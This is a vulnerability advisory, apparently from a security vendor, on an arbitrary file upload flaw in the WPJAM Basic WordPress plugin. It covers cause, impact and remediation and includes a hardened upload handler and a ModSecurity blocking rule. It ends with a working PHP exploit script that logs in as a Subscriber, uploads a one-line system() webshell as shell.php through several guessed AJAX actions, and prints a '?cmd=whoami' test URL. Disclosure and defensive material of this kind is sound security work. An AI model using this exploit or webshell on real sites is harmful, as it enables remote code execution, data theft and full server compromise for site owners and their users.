Atomic Edge analysis of CVE-2026-32523 (metadata-based):
The WPJAM Basic plugin for WordPress versions up to and including 6.9.2 contains an arbitrary file upload vulnerability. This vulnerability affects the plugin’s file upload functionality. Attackers with Subscriber-level authentication can upload malicious files to the server. The CVSS score of 8.8 (High) reflects the low attack complexity and high impact on confidentiality, integrity, and availability.
Atomic Edge research indicates the root cause is CWE-434: Unrestricted Upload of File with Dangerous Type. The vulnerability description cites missing file type validation, which suggests the plugin's upload handler processes files without verifying their MIME type, extension, or content. The plugin likely accepts uploads through WordPress AJAX endpoints or REST API routes. These conclusions are inferred from the CWE classification and common WordPress plugin patterns; no source code diff is available for confirmation.
Exploitation requires an authenticated WordPress user account with at least Subscriber privileges. Attackers would identify the vulnerable upload endpoint, typically accessed via /wp-admin/admin-ajax.php with an action parameter containing 'wpjam' or the plugin slug. The request would include a multipart form with a malicious file payload. Attackers could upload PHP webshells with extensions like .php, .phtml, or .php5. They might bypass client-side validation by modifying Content-Type headers or using double extensions. Successful exploitation results in the file being stored in a web-accessible directory.
Remediation requires implementing proper file validation. The patched version 6.9.2.1 likely added server-side file type checking. This includes verifying file extensions against an allowlist, checking MIME types, validating file content with magic-byte detection, and restricting upload directories. WordPress plugins should use wp_check_filetype_and_ext() for validation and current_user_can('upload_files') for authorization. The fix should also store uploaded files outside web-accessible locations or apply .htaccess restrictions that prevent script execution in the upload directory.
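As an added example (not the plugin's or Atomic Edge's code), the following WordPress AJAX upload handler applies the checks listed above in the order a request should meet them. The action name example_secure_upload, the nonce action example_upload_nonce and the field name file are assumptions; every function called is a real WordPress core API, so the snippet runs only inside a WordPress install.

```php
<?php
// Hardened AJAX upload handler (added example, not WPJAM Basic's code).
// Hypothetical names: action 'example_secure_upload', nonce action
// 'example_upload_nonce', field 'file'. All functions are WordPress core.
add_action( 'wp_ajax_example_secure_upload', 'example_secure_upload_handler' );

function example_secure_upload_handler() {
    // 1. Authorization: Subscriber lacks 'upload_files', so a Subscriber
    //    session is rejected before any file handling runs.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    // 2. CSRF protection: expects the nonce in the '_ajax_nonce' field.
    check_ajax_referer( 'example_upload_nonce' );

    if ( empty( $_FILES['file'] ) || ! is_uploaded_file( $_FILES['file']['tmp_name'] ) ) {
        wp_send_json_error( 'no file received', 400 );
    }
    $file = $_FILES['file'];

    // 3. Allowlist, not denylist: only these extension => MIME pairs pass,
    //    so .php, .phtml, .phar etc. never need to be enumerated.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'pdf'      => 'application/pdf',
    );

    // 4. Server-side type check: core matches the extension against
    //    $allowed and sniffs the real content (getimagesize/fileinfo), so a
    //    PHP payload renamed to shell.png or shell.php.jpg is rejected.
    $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $allowed );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( 'file type not allowed', 415 );
    }
    // Core may correct the name when the extension and content disagree.
    if ( ! empty( $check['proper_filename'] ) ) {
        $file['name'] = $check['proper_filename'];
    }
    $file['name'] = sanitize_file_name( $file['name'] );

    // 5. Let core move the file into the uploads directory; 'mimes'
    //    re-applies the allowlist and 'test_form' is false for AJAX posts.
    $result = wp_handle_upload( $file, array( 'test_form' => false, 'mimes' => $allowed ) );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( $result['error'], 400 );
    }
    wp_send_json_success( array( 'url' => $result['url'] ) );
}
```

Pair the handler with the .htaccess or web-server rule mentioned above that disables script execution in the uploads directory, so a validation bypass still cannot yield code execution.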
Successful exploitation leads to remote code execution. Attackers can upload PHP webshells or other executable files to compromise the entire WordPress installation. This allows complete server control, data theft, privilege escalation, and site defacement. The attacker can execute arbitrary commands, access databases, and establish persistent backdoors. Even with Subscriber privileges, this vulnerability provides full system compromise due to the file upload capability.
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-32523 (metadata-based)
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
    "id:10032523,phase:2,deny,status:403,chain,msg:'CVE-2026-32523: WPJAM Basic Arbitrary File Upload via AJAX',severity:'CRITICAL',tag:'CVE-2026-32523',tag:'WordPress',tag:'Plugin:wpjam-basic',tag:'Attack/FileUpload'"
    SecRule ARGS_POST:action "@rx ^wpjam_(upload|basic_upload|file_upload|ajax_upload)$" \
        "chain,t:none"
        SecRule FILES "@rx \.(php|phtml|php3|php4|php5|php7|phps|phar|inc|pl|cgi|py|sh|exe|dll|bat|cmd|js|jsp|asp|aspx)\.?$" \
            "t:lowercase,t:urlDecodeUni,msg:'Blocked malicious file upload via WPJAM Basic AJAX endpoint'"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-32523 - WPJAM Basic <= 6.9.2 - Authenticated (Subscriber+) Arbitrary File Upload
<?php
/**
* Proof of Concept for CVE-2026-32523
* Assumptions based on metadata analysis:
* 1. Vulnerable endpoint is /wp-admin/admin-ajax.php
* 2. Action parameter contains 'wpjam' or plugin slug
* 3. File upload parameter is 'file' or similar
* 4. Subscriber authentication required
* 5. No file type validation exists
*/
$target_url = 'https://target-site.com'; // CHANGE THIS
$username   = 'subscriber_user';         // CHANGE THIS - Subscriber account
$password   = 'subscriber_pass';         // CHANGE THIS

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$ajax_url  = $target_url . '/wp-admin/admin-ajax.php';

// Create temporary cookie file
$cookie_file = tempnam(sys_get_temp_dir(), 'wpjam_cookie_');

// Initialize cURL session for login
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL            => $login_url,
    CURLOPT_POST           => true,
    CURLOPT_POSTFIELDS     => http_build_query([
        'log'         => $username,
        'pwd'         => $password,
        'wp-submit'   => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie'  => '1'
    ]),
    CURLOPT_COOKIEJAR      => $cookie_file,
    CURLOPT_COOKIEFILE     => $cookie_file,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => false
]);
$response = curl_exec($ch);

// Check login success by looking for WordPress dashboard indicators
if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('Authentication failed. Check credentials.');
}

// Step 2: Create malicious PHP webshell
$webshell_content = '<?php if(isset($_REQUEST["cmd"])) { system($_REQUEST["cmd"]); } ?>';
$temp_file = tempnam(sys_get_temp_dir(), 'wpjam_');
file_put_contents($temp_file, $webshell_content);

// Step 3: Attempt file upload through suspected vulnerable endpoint
// Common WordPress AJAX action patterns for upload functionality
$possible_actions = [
    'wpjam_upload',
    'wpjam_basic_upload',
    'wpjam_file_upload',
    'wpjam_ajax_upload'
];

foreach ($possible_actions as $action) {
    echo "Trying action: $action\n";
    $post_fields = [
        'action' => $action,
        'file'   => new CURLFile($temp_file, 'application/x-php', 'shell.php')
    ];
    curl_setopt_array($ch, [
        CURLOPT_URL            => $ajax_url,
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => $post_fields,
        CURLOPT_COOKIEFILE     => $cookie_file,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HTTPHEADER     => [
            'Content-Type: multipart/form-data'
        ]
    ]);
    $upload_response = curl_exec($ch);

    // Check for successful upload indicators
    if (strpos($upload_response, 'url') !== false ||
        strpos($upload_response, 'success') !== false ||
        strpos($upload_response, '.php') !== false) {
        echo "Potential success with action: $action\n";
        echo "Response: $upload_response\n";
        // Extract uploaded file URL from JSON response
        $json_response = json_decode($upload_response, true);
        if ($json_response && isset($json_response['url'])) {
            echo "Uploaded file accessible at: " . $json_response['url'] . "\n";
            echo "Test with: " . $json_response['url'] . "?cmd=whoami\n";
        }
        break;
    }
}

// Cleanup
curl_close($ch);
unlink($cookie_file);
unlink($temp_file);

if (!isset($json_response['url'])) {
    echo "Exploit attempt completed. No clear success indicator found.\n";
    echo "Manual verification required: check uploads directory for shell.php\n";
}
?>